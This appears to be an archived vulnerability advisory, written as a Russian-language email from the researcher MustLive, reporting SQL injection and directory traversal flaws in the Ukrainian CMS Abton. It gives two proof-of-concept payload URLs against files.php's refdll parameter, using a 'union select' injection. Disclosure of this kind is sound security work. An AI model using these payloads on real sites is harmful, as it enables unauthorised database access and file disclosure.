Lucene search
SecurityvulnsSECURITYVULNS:DOC:23259HistoryFeb 22, 2010 - 12:00 a.m.
SQL Injection and Directory Traversal vulnerabilities in Abton
2010-02-2200:00:00
vulners.com
17
Здравствуйте 3APA3A!
Сообщаю вам о найденных мною SQL Injection и Directory Traversal уязвимостях
в Abton (это украинская CMS).
SQL Injection:
http://site/files.php?refdll=-1+union+select+version()%23
Directory Traversal (через SQL Injection):
http://site/files.php?refdll=-1+union+select+’../file.php’%23
Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/3618/
Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua